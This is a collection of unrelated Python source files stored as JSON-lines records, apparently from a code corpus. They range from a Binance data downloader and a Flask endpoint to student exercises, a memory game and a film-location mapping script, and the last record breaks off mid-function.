-2] - 2 * grid[..., 1]\n dgrid[..., -1] = grid[..., -1] + grid[..., -3] - 2 * grid[..., -2]\n if r is not None:\n drr[..., 0] = (rr[..., 1] - rr[..., 0]) * \\\n (rr[..., 2] - rr[..., 1])\n drr[..., -1] = (rr[..., -1] - rr[..., -2]) * \\\n (rr[..., -2] - rr[..., -3])\n\n # compute derivatives\n if r is not None:\n dgrid /= drr\n\n # restore grid array\n grid = np.transpose(grid, p)\n dgrid = np.transpose(dgrid, p)\n\n # return\n return dgrid\n","sub_path":"dk_met_base/derivative.py","file_name":"derivative.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"248346194","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\n\n\n# 用于 cookie 加密,请换一个随机的,足够长,足够复杂的字符串\n# !!! 不要使用现在这个\nCOOKIE_SECRET = \"May the Force Be with you\"\n\n\n# 数据库文件路径,默认是和配置文件同目录\n# eg. DATABASE = \"/home/myblog/mydb.db\"\nDATABASE = \"/home/serho/website/newblog.db\"\n\n\n# 你的博客名\nSITE_NAME = \"I'm SErHo\"\n\n\n# Picky 目录路径,默认和配置文件同目录\nPICKY_DIR = \"/home/serho/website/picky\"\n\n\n# 如果在生成环境下,可以关闭 Debug 选项,这样将缓存编译好的模板,加快模板渲染速度\n# 不过修改模板或代码后,需要重新启动博客,这样才有效果\n# DEBUG = True\nDEBUG = False\n\n\ndel os\n","sub_path":"blogconfig.py","file_name":"blogconfig.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"217686219","text":"# -*- coding: utf-8 -*-\n\ndef impar(x):\n if x%2==1:\n return(True)\n else:\n return(False)\nfor i in range(1000,10000,1) :\n soma = 0\n cont = 1\n if (i%2!=0) :\n while(i>0) :\n if (cont%2!=0) :\n soma = soma-(i%10)\n else :\n soma = soma+(i%10)\n cont = cont+1\n i = i//10\n print(i)","sub_path":"moodledata/vpl_data/148/usersdata/268/86826/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640201247","text":"num = input(\"Enter ISBN: \")\nsum1 = 0\nsum2 = 0\nfor index in range (0,13,2):\n temp = int(num[index])\n sum1 = sum1 + temp\nfor index2 in range (1,12,2):\n temp2 = int(num[index2])*3\n sum2 = sum2 + temp2\ntotal = sum1 + sum2 \nremain = total % 10\nx13 = 10 - remain","sub_path":"isbn3.py","file_name":"isbn3.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"276777575","text":"#!/usr/bin/env python3\n\nfrom flask import Flask, jsonify\nfrom git import Repo, NoSuchPathError\nfrom os import environ\n\nfrom . import settings\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=['GET'])\ndef home():\n response = {'head': ''}\n code_dir = settings.QSEE_CODE_DIR\n response['code_dir'] = code_dir\n try:\n repo = Repo(code_dir)\n response['head'] = repo.head.ref.name\n response['status'] = 'success'\n except NoSuchPathError as e:\n response['messages'] = 'no such path '\n response['status'] = 'failed'\n return jsonify(response)\n","sub_path":"qsee/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650211826","text":"from __future__ import division, absolute_import, print_function\n\nimport backtrader as bt\nimport numpy as np\nimport pandas as pd\n\nfrom datetime import datetime\nfrom dateutil import parser\nfrom binance.client import Client\n\nimport time\nimport pytz\n\n\nclass BinanceDownloadApp:\n\n # https://github.com/pratikpv/cryptocurrency_data_downloader/blob/master/download_data_from_binance.py\n\n FMT = \"%Y-%m-%d %H:%M:%S\" # e.g. 2019-11-16 23:16:15\n ORG_COLS = ['open', 'high', 'low', 'close', 'volume', 'close_time',\n 'quote_av', 'trades', 'tb_base_av', 'tb_quote_av', 'ignore']\n COLS = ['open', 'high', 'low', 'close', 'volume']\n INTERVALS = {\n (bt.TimeFrame.Minutes, 1): '1m',\n (bt.TimeFrame.Minutes, 3): '3m',\n (bt.TimeFrame.Minutes, 5): '5m',\n (bt.TimeFrame.Minutes, 15): '15m',\n (bt.TimeFrame.Minutes, 30): '30m',\n (bt.TimeFrame.Minutes, 60): '1h',\n (bt.TimeFrame.Minutes, 120): '2h',\n (bt.TimeFrame.Minutes, 240): '4h',\n (bt.TimeFrame.Minutes, 360): '6h',\n (bt.TimeFrame.Minutes, 480): '8h',\n (bt.TimeFrame.Minutes, 720): '12h',\n (bt.TimeFrame.Days, 1): '1d',\n (bt.TimeFrame.Days, 3): '3d',\n (bt.TimeFrame.Weeks, 1): '1w',\n (bt.TimeFrame.Months, 1): '1M'\n }\n\n def __init__(self, api_key, api_secret):\n self.api_key = api_key\n self.api_secret = api_secret\n self.client = Client(self.api_key, self.api_secret)\n\n def download(self, filename, symbol, timeframe, compression,\n from_date, to_date, pause=-1):\n \"\"\"\n :param filename:\n :param symbol:\n :param timeframe:\n :param compression:\n :param from_date:\n :param to_date:\n :param pause: pause seconds before downloading next batch.\n if pause == -1 --> random sleep(2,5)\n if pause == 0 --> no sleep\n if pause == num--> sleep for num of seconds\n :return:\n \"\"\"\n if (timeframe, compression) not in self.INTERVALS:\n raise Exception(\n f'Unsupported ({timeframe}-{compression})'\n + ' granularity provided')\n interval = self.INTERVALS[(timeframe, compression)]\n try:\n data = pd.read_csv(filename)\n data_len = len(data)\n from_date = parser.parse(data.iloc[-1].time, ignoretz=True)\n except IOError:\n data_len = 0\n from_millis = self._toUnixMillis(from_date)\n to_millis = None\n if to_date:\n to_millis = self._toUnixMillis(to_date)\n count = 0\n while True:\n # download data\n print(f'Fetching binance historical data for {symbol}'\n + f' {from_date} ({count + 1})')\n klines = self.client.get_historical_klines(\n symbol, interval, str(from_millis), str(to_millis))\n new_columns = self.ORG_COLS.copy()\n new_columns.insert(0, 'time')\n if len(klines) > 0:\n data_df = pd.DataFrame(\n klines, columns=new_columns)\n else:\n break\n for i in self.ORG_COLS:\n if i not in self.COLS:\n del data_df[i]\n data_df['time'] = pd.to_datetime(\n data_df['time'], unit='ms')\n\n # if first line then output also headers\n if data_len == 0:\n data_df.to_csv(filename, index=False)\n else:\n data_df[1:].to_csv(filename, header=None,\n index=False, mode='a')\n data_len += len(data_df)\n\n # check for exit\n if to_millis and from_millis >= to_millis:\n break\n if from_date == data_df.iloc[-1].time:\n break\n # move to next step of batches\n from_date = data_df.iloc[-1].time\n from_millis = self._toUnixMillis(from_date)\n count = count + 1\n if pause == -1:\n pause = np.random.randint(2, 5)\n time.sleep(pause)\n\n def _convertTimeToUtc(self, pst_time):\n utc = pytz.utc\n pst = pytz.timezone('America/Los_Angeles')\n datetime1 = datetime.strptime(pst_time, self.FMT)\n pst_time = pst.localize(datetime1)\n return pst_time.astimezone(utc).strftime(self.FMT)\n\n def _convertTimeToPst(self, utc_time):\n datetime_obj = datetime.strptime(utc_time, self.FMT)\n return datetime_obj.replace(\n tzinfo=time.timezone('UTC')).strftime(self.FMT)\n\n def _toUnixMillis(self, from_date):\n past = datetime(1970, 1, 1, tzinfo=from_date.tzinfo)\n return int((from_date - past).total_seconds() * 1000.0)\n\n def _toDatetime(self, ms):\n return datetime.fromtimestamp(int(float(ms) / 1000.0))\n","sub_path":"btconfig/utils/download/binance.py","file_name":"binance.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"392423967","text":"import click\nimport requests\nimport json\nimport os\nfrom os import environ\nfrom colored import fg\nfrom colored import stylize\nfrom colored import attr\n\n\n# getting the base API URL\nif environ.get('VECTORDASH_BASE_URL'):\n VECTORDASH_URL = environ.get('VECTORDASH_BASE_URL')\n print(\"Using development URL: {}\".format(VECTORDASH_URL))\nelse:\n VECTORDASH_URL = \"https://vectordash.com/\"\n\n\n@click.command(name='list')\ndef list():\n \"\"\"\n Lists your active GPU instances.\n \"\"\"\n try:\n token = os.path.expanduser('~/.vectordash/token')\n\n if os.path.isfile(token):\n with open(token, 'r') as f:\n secret_token = f.readline()\n\n # building the full URL\n full_url = VECTORDASH_URL + \"api/list_machines/\" + str(secret_token)\n\n r = requests.get(full_url)\n\n if r.status_code == 200:\n data = r.json()\n\n if len(data) > 0:\n green_bolded = fg(\"green\") + attr(\"bold\")\n print(\"Your Vectordash instances:\")\n for i in range(len(data)):\n\n # getting the machine dict (we add one since we don't zero index the list we print out)\n machine = data[str(i + 1)]\n pretty_id = stylize(\"[\" + str(i + 1) + \"]\", green_bolded)\n\n # building the string to print out\n machine_string = str(pretty_id) + \" \" + str(machine['name'])\n\n # if an error has occurred, we display an error\n if machine['error_occurred']:\n machine_string = machine_string + stylize(\" (unexpected error)\", fg(\"red\"))\n\n # if the machine is not ready yet\n elif not machine['ready']:\n machine_string = machine_string + \" (starting)\"\n\n print(machine_string)\n else:\n vd = stylize(VECTORDASH_URL + \"create/\", fg(\"blue\"))\n print(\"You currently have no instances. Go to \" + vd + \" to start an instance.\")\n else:\n print(stylize(\"Invalid token. Please enter a valid token.\", fg(\"red\")))\n\n else:\n print(stylize(\"Unable to locate token. Please make sure a valid token is stored.\", fg(\"red\")))\n print(\"Run \" + stylize(\"vectordash secret \", fg(\"blue\")))\n print(\"Your token can be found at \" + stylize(\"https://vectordash.com/edit/verification\", fg(\"blue\")))\n\n except TypeError:\n type_err = \"Please make sure a valid token is stored. Run \"\n print(type_err + stylize(\"vectordash secret \", fg(\"blue\")))\n","sub_path":"vectordash/cli/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"275308113","text":"from bs4 import BeautifulSoup\nfrom collections import defaultdict\nimport requests\nimport time\nimport json\nimport pandas as pd\n\n\ndef get_pokemon_types(poke):\n url = \"https://pokemondb.net/pokedex/\" + poke\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'html')\n vitals = soup.find('table', {'class':'vitals-table'})\n typeset = vitals.find_all('tr')[1].find_all('a')\n type_list = [typ.text for typ in typeset]\n return type_list\n\nproblem_pokes = {\n 133:['Psychic','Fairy'],\n 436:['Grass','Dragon'],\n 441:['Dragon','Fairy'],\n 445:['Normal','Fighting'],\n 456:['Water','Dark'],\n 457:['Bug','Flying'],\n 460:['Steel'],\n 469:['Electric','Dragon'],\n 472:['Normal','Fairy'],\n 515:['Ice','Steel'],\n 517:['Psychic','Fairy'],\n 518:['Electric','Fairy'],\n 522:['Grass','Fairy'],\n 524:['Water','Fairy'],\n 540:['Dragon','Fighting'],\n 528:['Electric','Psychic'],\n 530:['Fire','Ghost'],\n 537:['Poison','Dark'],\n 538:['Ice','Fairy'],\n 548:['Grass','Dragon'],\n 562:['Normal'],\n 574:['Ground','Steel'],\n 575:['Dark'],\n 577:['Rock','Electric'],\n 583:['Dark','Normal'],\n 598:['Dark','Normal'],\n 601:['Dragon','Fighting'],\n 631:['Ice', 'Psychic'],\n 638:['Fighting'],\n 634:['Poison','Fairy'],\n 650:['Ice','Psychic'],\n 652:['Ice'],\n 653:['Psychic','Fairy'],\n 678:['Ghost'],\n 681:['Ground','Steel'],\n 684:['Fighting'],\n 690:['Dark','Normal'],\n 697:['Psychic'],\n 709:['Poison','Psychic'],\n 708:['Fighting','Water']\n}\n\nif __name__ == '__main__':\n pokemon_df = pd.read_csv('~/Pokestars/data/clean/pokemon_reference.csv')\n\n pokemon_df['type_1'] = 'None'\n pokemon_df['type_2'] = 'None'\n\n for row in pokemon_df.iterrows():\n poke = row[1]['name'].lower().split('-')[0]\n try:\n type_list = get_pokemon_types(poke)\n\n pokemon_df['type_1'].loc[row[0]] = type_list[0]\n\n if len(type_list) > 1:\n pokemon_df['type_2'].loc[row[0]] = type_list[1]\n except:\n print (f'Pokemon: {row[1][\"name\"]} ID: {row[0]} FAILED')\n #THE PRINT STATEMENT SHOULD BE RESOLVED BY THE PROBLEM_POKES dictionary LOOP BELOW\n #IF AN ID THROWS AN ERROR NOT IN THE DICTIONARY IT IS PROBABLY A CONNECTION ISSUE\n\n time.sleep(8)\n if row[0] % 50 == 0:\n print (f'{row[0]} out of {pokemon_df.shape[0]} Pokemon complete')\n \n for key, type_list in problem_pokes.items():\n for typ in type_list:\n if typ not in list(pokemon_df.type_1) or typ not in list(pokemon_df.type_2):\n print (f'ERROR @ : {key}')\n pokemon_df['type_1'].loc[key] = type_list[0]\n if len(type_list) > 1:\n pokemon_df['type_2'].loc[key] = type_list[1]\n \n\n print ('completed all')\n pokemon_df.to_csv('~/Pokestars/data/clean/pokemon_withtypes_reference.csv')","sub_path":"src/scrape_pokemon_types.py","file_name":"scrape_pokemon_types.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"375432464","text":"import re;\n\n# Hide some functions at the top of the stack that are merely helper functions and not relevant to the error:\nasHiddenTopFrames = [\n \"KERNELBASE.dll!RaiseException\",\n \"msvcrt.dll!CxxThrowException\",\n \"msvcrt.dll!_CxxThrowException\",\n \"MSVCR110.dll!CxxThrowException\",\n \"MSVCR110.dll!_CxxThrowException\",\n]\n# Some C++ exceptions may be out-of-memory errors.\nddtxErrorTranslations_by_uExceptionCode = {\n 0xe06d7363: { # This entry was created before the code determined the exception class name...\n \"OOM\": (\n \"The process triggered a C++ exception to indicate it was unable to allocate enough memory\",\n None,\n [\n [\n \"KERNELBASE.dll!RaiseException\",\n \"msvcrt.dll!_CxxThrowException\",\n \"jscript9.dll!Js::Throw::OutOfMemory\",\n ],\n ],\n ),\n },\n};\nddtxErrorTranslations_by_sExceptionCallName = {\n \"std::bad_alloc\": {\n \"OOM\": (\n \"The process triggered a std::bad_alloc C++ exception to indicate it was unable to allocate enough memory\",\n None,\n [\n [\n \"KERNELBASE.dll!RaiseException\",\n \"msvcrt.dll!_CxxThrowException\",\n ],\n ],\n ),\n },\n};\n\ndef cErrorReport_foSpecialErrorReport_CppException(oErrorReport, oCdbWrapper):\n # Attempt to get the symbol of the virtual function table of the object that was thrown and add that the the type id:\n oException = oErrorReport.oException;\n assert len(oException.auParameters) >= 3, \\\n \"Expected a C++ Exception to have at least 3 parameters, got %d\" % len(oException.auParameters);\n poException = oException.auParameters[1];\n asExceptionVFtablePointer = oCdbWrapper.fasSendCommandAndReadOutput(\"dps 0x%X L1\" % poException);\n if not oCdbWrapper.bCdbRunning: return None;\n sCarriedLine = \"\";\n for sLine in asExceptionVFtablePointer:\n oExceptionVFtablePointerMatch = re.match(r\"^[0-9A-F`]+\\s*[0-9A-F`\\?]+(?:\\s+(.+))?\\s*$\", asExceptionVFtablePointer[0], re.I);\n assert oExceptionVFtablePointerMatch, \"Unexpected dps result:\\r\\n%s\" % \"\\r\\n\".join(asExceptionVFtablePointer);\n sExceptionObjectVFTablePointerSymbol = oExceptionVFtablePointerMatch.group(1);\n if sExceptionObjectVFTablePointerSymbol is None: break;\n sExceptionObjectSymbol = sExceptionObjectVFTablePointerSymbol.rstrip(\"::`vftable'\");\n if \"!\" not in sExceptionObjectSymbol:\n # No symbol information available, just an address\n dtxErrorTranslations = ddtxErrorTranslations_by_uExceptionCode.get(oException.uCode);\n if dtxErrorTranslations:\n oErrorReport = oErrorReport.foTranslateError(dtxErrorTranslations);\n break;\n sModuleCdbId, sExceptionClassName = sExceptionObjectSymbol.split(\"!\", 1);\n oErrorReport.sErrorTypeId += \":%s\" % sExceptionClassName;\n dtxErrorTranslations = ddtxErrorTranslations_by_sExceptionCallName.get(sExceptionClassName);\n if dtxErrorTranslations:\n oErrorReport = oErrorReport.foTranslateError(dtxErrorTranslations);\n break;\n if oErrorReport:\n oErrorReport.oStack.fHideTopFrames(asHiddenTopFrames);\n return oErrorReport;\n","sub_path":"cErrorReport_foSpecialErrorReport_CppException.py","file_name":"cErrorReport_foSpecialErrorReport_CppException.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470247046","text":"#!/usr/bin/env python\n\nimport re\n\nclass Test:\n \"\"\" One ATN test along with test results and log pointers \"\"\"\n urlbase=''\n def __init__(s,urlbase):\n s.urlbase=urlbase\n s.name = 'EMPTY'\n # exit status\n s.overall = False\n s.exit = False\n s.error = None\n s.exitcode = None\n # links to log segments:\n s.lextract = None\n s.lerror = None\n s.ldir = None\n s.ltail = None\n s.llog = None\n def initAtn(s,row):\n \"\"\" Initializes one ATN test from a BeautifulSoup-formatted table row \"\"\"\n s.row = v = row.findAll('td')\n assert len(v)==14,'Expecting 14 columns in ATN results table but found: %d'%len(v)\n s.name = str(v[0].contents[0].string)\n # exit status\n s.overall = str(v[2].contents[0].string)\n s.exit = str(v[3].contents[0].string)\n try:\n s.error = str(v[4].contents[0].contents[0].string)\n except:\n s.error = 'None'\n s.exitcode = str(v[10].string)\n # links to log segments:\n s.lextract = s.urlbase + str(v[0].a['href'])\n if v[4].a:\n s.lerror = s.urlbase + str(v[4].a['href'])\n s.ldir = s.urlbase + str(v[-2].a['href'])\n logs = v[-1].findAll('a')\n if s.overall != 'SKIP' and len(logs)==2:\n s.ltail = s.urlbase + str(logs[0]['href'])\n s.llog = s.urlbase + str(logs[1]['href'])\n def __str__(s):\n return '%s\\t %s %s %s'%(s.name,s.overall,s.exit,s.error)\n def is_error_athena(s):\n nafail = (s.error == 'N/A') and (s.exit=='FAIL') and (s.overall=='ERROR')\n timeout = (s.exit=='TIMEOUT')\n return True if (re.match('FAIL',s.error) or nafail or timeout) else False\n def is_error_exit(s):\n if s.is_error_athena(): return False\n return True if re.match('FAIL',s.exit) else False\n def is_error_post(s):\n if s.is_error_athena(): return False\n if s.is_error_exit(): return False\n return True if re.match('ERROR',s.overall) else False\n def samebug(s,t):\n if t.name == s.name and t.overall==s.overall and t.exit==s.exit and t.error==s.error and t.exitcode==s.exitcode:\n return True\n return False\n def fixedbug(s,t):\n \"\"\" s = older nightly; t = current nightly\"\"\"\n if t.name != s.name: return False\n assert s.is_error_exit() or s.is_error_athena(),'This function should only be called from buggy tests'\n if t.is_error_athena(): return False\n if t.is_error_exit(): return False\n if t.is_error_post(): return False # let's keep this as a failure category, too\n return True\n","sub_path":"TriggerValidation/tags/TriggerValidation-12-03-08/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"652535882","text":"import sys\r\nfrom random import *\r\nfrom turtle import *\r\nfrom freegames import path\r\n\r\ncar = path('car.gif')\r\n\r\n# Se define un loop para ingresar la modalidad deseada mientras que funcione\r\nwhile True:\r\n try:\r\n num_or_colors = int(input(\"Ingrese algún número: 0. Numero | 1. Letras con acentos | 2. Salir\\n\"))\r\n if num_or_colors == 0:\r\n tiles = list(range(32)) * 2\r\n break\r\n elif num_or_colors == 1:\r\n tiles = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"ñ\", \"o\", \"p\", \"q\", \"r\",\r\n \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\", \"ó\", \"í\", \"é\", \"á\", \"ú\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\",\r\n \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"ñ\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\",\r\n \"y\", \"z\", \"ó\", \"í\", \"é\", \"á\", \"ú\"]\r\n break\r\n elif num_or_colors == 2:\r\n sys.exit(0)\r\n\r\n except ValueError: # Si hay un error al ingresar los numero, vuelva a intentar\r\n print(\"Por favor intente de nuevo\")\r\n\r\nstate = {'mark': None, 'numTap':0}\r\nhide = [True] * 64\r\n\r\ndef square(x, y):\r\n \"Draw white square with black outline at (x, y).\"\r\n up()\r\n goto(x, y)\r\n down()\r\n color('black', 'white')\r\n begin_fill()\r\n for count in range(4):\r\n forward(50)\r\n left(90)\r\n end_fill()\r\n\r\n\r\ndef index(x, y):\r\n \"Convert (x, y) coordinates to tiles index.\"\r\n return int((x + 200) // 50 + ((y + 200) // 50) * 8)\r\n\r\n\r\ndef xy(count):\r\n \"Convert tiles count to (x, y) coordinates.\"\r\n return (count % 8) * 50 - 200, (count // 8) * 50 - 200\r\n\r\n\r\ndef tap(x, y):\r\n \"Update mark and hidden tiles based on tap.\"\r\n # Usa coordenadas de la imagen para encontrar indice de hide\r\n spot = index(x, y)\r\n # Mark se inicializa en None\r\n mark = state['mark']\r\n # Cada tap agrega un numero a la cuenta de taps\r\n state['numTap'] += 1\r\n\r\n if mark is None or mark == spot or tiles[mark] != tiles[spot]:\r\n # Si mark es none se le inicializa asignando un indice que indica un numero\r\n # Si el indice en mark es igual al nuevo seleccionado se le reasigna el mismo numero\r\n # Si es el numero es diferente al anterior se le reasigna un nuevo indice\r\n state['mark'] = spot\r\n else:\r\n # Si son distintos indices pero el mismo numero\r\n hide[spot] = False\r\n hide[mark] = False\r\n state['mark'] = None\r\n\r\n\r\ndef draw():\r\n \"Draw image and tiles.\"\r\n clear()\r\n goto(0, 0)\r\n shape(car)\r\n stamp()\r\n\r\n for count in range(64):\r\n # Se dibujan los cuadros para los tiles que tienen hide = True\r\n if hide[count]:\r\n x, y = xy(count)\r\n square(x, y)\r\n\r\n mark = state['mark']\r\n\r\n if mark is not None and hide[mark]:\r\n # Si no estan marcados, se marca\r\n x, y = xy(mark)\r\n up()\r\n goto(x + 25.6, y) # El valor fue encontrado empiricamente\r\n color('black')\r\n write(tiles[mark], align='center', font=('Arial', 28, 'normal')) # En el Write se alinea el numero al centro\r\n\r\n # Si todos los tiles estan ocultos. Se acabo el juego\r\n if not any(hide):\r\n\r\n print(\"Acabo, felicidades!!\")\r\n print(\"tu numero de taps fue de:\", state['numTap'])\r\n else:\r\n # Se actualiza tablero\r\n update()\r\n ontimer(draw, 100)\r\n\r\nshuffle(tiles)\r\nsetup(420, 420, 370, 0)\r\naddshape(car)\r\nhideturtle()\r\ntracer(False)\r\nonscreenclick(tap)\r\ndraw()\r\ndone()","sub_path":"JuegoMemoria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"531884668","text":"import sqlalchemy\nfrom sqlalchemy import create_engine, Column, Integer, String, ForeignKey, Float\nfrom sqlalchemy.ext.declarative import declarative_base \nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom flask.ext.sqlalchemy import SQLAlchemy\n\nBase = declarative_base()\n\n\nclass Twitstock(Base):\n\t__tablename__='Twitstock'\n\tid = Column(Integer, primary_key=True)\n\tscreen_name=Column(String(50))\n\tcreated_at=Column(String(50))\n\ttext = Column(String(500))\n\tretweet_count = Column(Integer)\n\nclass ChinaStockNews(Base):\n\t__tablename__='ChinaStockNews'\n\tid = Column(Integer, primary_key=True)\n\tscreen_name=Column(String(50))\n\tcreated_at=Column(String(50))\n\ttext = Column(String(500))\n\tretweet_count = Column(Integer)\n\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"604910906","text":"import json\n\nimport pytest\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--credentials_json\",\n action=\"store\",\n default=None,\n help=\"path to catmaid credentials in JSON form\",\n )\n\n\n@pytest.fixture\ndef credentials(request):\n cred_path = request.config.getoption(\"--credentials_json\")\n\n if not cred_path:\n pytest.skip(\"No CATMAID credentials given\")\n\n with open(cred_path) as f:\n return json.load(f)\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565292369","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/kolekto/datasources/mediainfos.py\n# Compiled at: 2014-06-16 16:12:17\nimport os, logging\nfrom kolekto.datasources import Datasource\nfrom kolekto.helpers import JsonDbm\nimport kaa.metadata\nmetadata_logger = logging.getLogger('metadata')\nmetadata_logger.setLevel(logging.CRITICAL)\n\nclass MediainfosDatasource(Datasource):\n\n def __init__(self, *args, **kwargs):\n super(MediainfosDatasource, self).__init__(*args, **kwargs)\n cache_filename = os.path.join(self.tree, '.kolekto', 'media-info-cache.db')\n self._cache = JsonDbm(cache_filename)\n\n def attach(self, movie_hash, movie):\n if movie_hash in self._cache:\n media_infos = self._cache.get(movie_hash)\n else:\n filename = os.path.join(self.tree, '.kolekto', 'movies', movie_hash)\n infos = kaa.metadata.parse(filename)\n if infos is None:\n return movie\n media_infos = {}\n media_infos['container'] = infos['type'].strip()\n if infos.video[0].width < 1280:\n media_infos['quality'] = 'SD'\n elif 1280 <= infos.video[0].width < 1920:\n media_infos['quality'] = '720p'\n else:\n media_infos['quality'] = '1080p'\n media_infos['ext'] = infos['mime'].split('/')[(-1)]\n media_infos['runtime'] = int(infos['length'] / 60)\n self._cache.save(movie_hash, media_infos)\n movie.update(media_infos)\n return movie","sub_path":"pycfiles/kolekto-1.3.linux-x86_64.tar/mediainfos.py","file_name":"mediainfos.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619764442","text":"\"\"\" https://github.com/stepansushko1/Films_map \"\"\"\n\nimport folium\nimport geopy\nimport math\nfrom geopy.exc import GeocoderUnavailable\nfrom geopy.extra.rate_limiter import RateLimiter\n\n\ndef write_file_to_txt(read_path: str, write_path: str):\n \"\"\" Convert .list file to .txt format \"\"\"\n with open(read_path, \"r\", encoding='iso-8859-1') as file_1:\n\n for _ in range(14):\n next(file_1)\n our_text = file_1.read()\n\n with open(write_path, \"w\", encoding='iso-8859-1') as file_2:\n file_2.write(our_text)\n\n\ndef file_prepocessing(path: str):\n \"\"\" Processing of data. Bringing to next form: [film name, year, location, coords \"\"\"\n with open(path, \"r\", encoding='iso-8859-1') as file:\n lst_of_movies = []\n i = 0\n for line in file:\n line = line.strip()\n line = line.split(\"\\t\")\n line = list(filter(None, line)) # remove ''\n\n if line[-1][0] == \"(\": # for ( after the country\n del line[-1]\n\n line = \" \".join(line)\n if \"{\" in line: # перевірка на лишні { } після року\n line = line.replace(\"{\", '\\t')\n line = line.replace(\"}\", '\\t')\n line = line.split(\"\\t\")\n del line[1]\n line = ' '.join(line)\n\n line = line.split(\" \")\n line = list(filter(None, line))\n\n for i in range(len(line)):\n\n if line[i][0] == \"(\":\n\n year = line[i]\n film_name = \" \".join(line[:i])\n location = \" \".join(line[i+1:])\n\n if location[0] == \"(\":\n location = location[location.find(\")\") + 1:]\n\n line.clear()\n line.append(film_name)\n line.append(year[1:-1]) # year withou ()\n line.append(location)\n\n break\n\n lst_of_movies.append(line)\n\n return lst_of_movies\n\n\ndef find_year(films_lst: list, year: int):\n \"\"\" Filter list of films by given year \"\"\"\n filtered_films_lst = [line for line in films_lst if line[1] == str(year)]\n\n return filtered_films_lst\n\n\ndef add_coords(filtered_lst):\n \"\"\" Find coordinates for list of films \"\"\"\n for line in filtered_lst:\n try:\n location = line[2]\n\n location = location.split(\", \")\n geolocator = geopy.Nominatim(user_agent=\"main.py\")\n geocode = RateLimiter(geolocator.geocode, min_delay_seconds=0.05)\n adres = geolocator.geocode(location)\n\n if adres == None:\n location = location[1:]\n adres = geolocator.geocode(location)\n\n if adres == None:\n location = location[1:]\n adres = geolocator.geocode(location)\n\n coords = (float(adres.latitude), float(adres.longitude))\n\n line.append(coords)\n\n except GeocoderUnavailable:\n\n line.append(\"error\")\n return filtered_lst\n\n\ndef coords_distance(my_coords: tuple, coords: tuple):\n \"\"\" Find distance between two coords \"\"\"\n try:\n haversinus = (math.sin((math.pi / 180) * (my_coords[0] - coords[0])/2)**2 + math.cos((math.pi / 180)*my_coords[0])\n * math.cos((math.pi / 180)*coords[0]) * math.sin((math.pi / 180)*(my_coords[1] - coords[1])/2)**2)\n except TypeError:\n haversinus = 100000\n\n try:\n distance = 6371.3 * 2 * math.asin(math.sqrt(haversinus))\n except ValueError:\n distance = 1000000\n\n return distance\n\n\ndef find_places(filtered_lst: list, my_coords: tuple):\n \"\"\" Find ten or less nearest places\"\"\"\n for i in range(len(filtered_lst)):\n filtered_lst[i].insert(0, coords_distance(\n my_coords, filtered_lst[i][3]))\n\n filtered_lst.sort()\n\n if len(filtered_lst) > 10:\n return filtered_lst[:10]\n\n return filtered_lst\n\n\ndef place_on_map(filtered_lst, my_coords):\n \"\"\" Generate a web-page with map and nearest movie places on it \"\"\"\n my_map = folium.Map(tiles='OpenStreetMap', location=[\n my_coords[0], my_coords[1]], zoom_start=5)\n\n fg = folium.FeatureGroup(name='Films map')\n\n lines = folium.FeatureGroup(name=\"Dots lines\")\n\n for i in filtered_lst:\n if i[4][0] != \"e\":\n fg.add_child(folium.Marker(location=[i[4][0], i[4][1]],\n popup=i[1]))\n\n lines.add_child(folium.PolyLine([(i[4][0], i[4][1]), my_coords]))\n\n fg_pp = folium.FeatureGroup(name=\"Colored map\")\n\n 